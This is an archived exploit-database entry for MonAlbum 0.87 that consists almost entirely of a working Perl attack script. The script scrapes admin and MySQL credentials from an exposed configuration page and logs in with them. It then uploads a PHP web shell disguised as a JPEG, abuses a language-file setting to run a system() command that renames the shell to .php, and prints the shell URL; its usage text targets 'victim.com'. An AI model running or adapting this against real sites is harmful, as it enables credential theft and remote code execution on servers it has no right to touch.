MonAlbum 0.87 - Arbitrary File Upload / Password Grabber

EDB-ID:

4714

CVE:

N/A


Platform:

PHP

Published:

2007-12-10

#!/usr/bin/env perl
use strict; use warnings;
###############################################
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;

my (%args, $user, $password, $sql_host, $sql_user, $sql_password, $cookie, $path, $file, $upload)  = ();
my $tmp = 'cmd1.jpg';

getopts("u:a:f:p:", \%args);
#######################################################################
# -a don't retrieve login and passwords, use from command line instead#
# -u vuln url                                                         #
# -f local php-shell                                                  #
# -p http proxy                                                       #
#######################################################################

if(!$args{u}) { &usage(); exit(0);}

if(defined $args{a}){
	($user,$password) = split(':',$args{a});
}

if(!$args{a}){
	my $ua= new LWP::UserAgent;
	$ua->agent("Mozilla/5.0");
	if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
	$ua->max_redirect(0);
	$args{u} =~ s%/$%%i;
	my $request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_configuration.php");
	my $document = $ua->request($request);
	my $response = $document->as_string;
	$response =~ m%<input type="text" name="gadm_user" value="(.*?)">%is;
	$user = $1;
	$response =~ m%<input type="password" name="gadm_pass" value="(.*?)">%is;
	$password = $1;
	$response =~ m%<input type="text" name="gcfgHote" value="(.*?)">%is;
	$sql_host = $1;
	$response =~ m%<input type="text" name="gcfgUser" value="(.*?)">%is;
	$sql_user = $1;
	$response =~ m%<input type="password" name="gcfgPass" value="(.*?)">%is;
	$sql_password = $1;
	print("########################################################################\n");
	if(defined $user && defined $password){
		print "#Admin Panel: $user\t$password                                         \n";
		print("########################################################################\n");
		print "#Mysql Details: $sql_host\t$sql_user\t$sql_password                    \n";
	}else{
		print "#Failed...                                                             #\n";
		exit(0);
	}
}

goto _EXIT_ unless defined $args{f};

my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
$args{u} =~ s%/$%%i;
my $request = HTTP::Request::Common::POST(
		"$args{u}/admin/login_page.php",
		Content_Type => 'application/x-www-form-urlencoded',
		Referer => "$args{u}/admin/login_page.php",
		Content => [
			login_adm => "$user",
			pass_adm => "$password",
			send => "Enter"
		]
	);
my $document = $ua->request($request);
my $response = $document->as_string;
if($response =~ m/document\.location\.replace\(\'\.\.\/admin\.php\'\)/i){
	print("########################################################################\n");
	print "#Login successfull                                                     #\n";
	$response =~ m%Set-Cookie: (.*?);%is;
	$cookie = $1;
}else{
	print("########################################################################\n");
	print "#Login failed                                                          #\n";
	goto _EXIT_;
}

$ua->default_headers->push_header('Cookie' => "$cookie");
$request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_ajouter_img.php");
$document = $ua->request($request);
$response = $document->as_string;
$response =~ m%<form ENCTYPE='multipart/form-data'  method='post' action=(.*?)>%i;
$upload = $1;

$request = HTTP::Request::Common::POST(
	"$args{u}/admin/$upload",
	Content_Type => 'multipart/form-data',
	Referer => "$args{u}/admin/admin_ajouter_img.php",
	Content => [
		MAX_FILE_SIZE => "1000000",
		userfile => [$args{f}],
		Content_Type => "image/jpeg"
	]
);

$document = $ua->request($request);
$response = $document->as_string;
#print $response;

$response =~ m%is not a valid JPEG file in <b>(.*?)<\/b>%i;
#/var/www/web70/html/monalbum/admin/admin_ajouter_img.php
#print $1;
$path = $1;
$path =~ s%/admin/admin_ajouter_img\.php%%i;
$path .= "/images";
#print $path;

$args{f} =~ m/([\w\.\-]+)$/i;
$file = $1;

open TEMP,">$tmp" || die "Can't open $tmp: $!\n";
print TEMP "<?php system(\"mv $path/$file $path/$file.php\"); die(); ?>";
close(TEMP);

$request = HTTP::Request::Common::POST(
	"$args{u}/admin/$upload",
	Content_Type => 'multipart/form-data',
	Referer => "$args{u}/admin/admin_ajouter_img.php",
	Content => [
		MAX_FILE_SIZE => "1000000",
		userfile => [$tmp],
		Content_Type => "image/jpeg"
	]
);

$document = $ua->request($request);
$request = HTTP::Request::Common::POST(
	"$args{u}/admin/admin_configuration.php",
	Content_Type => 'multipart/form-data',
	Referer => "$args{u}/admin/admin_configuration.php",
	Content => [
		glangage => "../images/$tmp",
		Save => "Save"
	]
);
$document = $ua->request($request);
$ua->max_redirect(0);
$request = new HTTP::Request( 'HEAD' => "$args{u}/images/$file.php");
$document = $ua->request($request);


if($document->is_success){
	print("########################################################################\n");
	print "#Shell Uploaded Successfull!                                           #\n";
	print "#U may now try: $args{u}/images/$file.php                              \n";
}else{
	print("########################################################################\n");
	print "#Something went wrong!!!                                               #\n";
	}

_EXIT_:
unlink($tmp);
print("########################################################################\n");
exit(0);

sub usage
{
print("###########################################################################
# -a using account from command line                                      #
# -u vuln url                                                             #
# -f local php-shell  (optional)                                          #
# -p http proxy       (optional)                                          #
###########################################################################
# : perl sp.pl -u http://victim.com/monalbum/ -p 75.34.123.215:9629       #
# : perl sp.pl -u http://victim.com/monalbum/ -f shell.jpg                #
# : perl sp.pl -u http://victim.com/monalbum/ -a admin:admin -f shell.jpg #
# this lame script was coded by v0l4arrra                                 #
###########################################################################
"
);
}

# milw0rm.com [2007-12-10]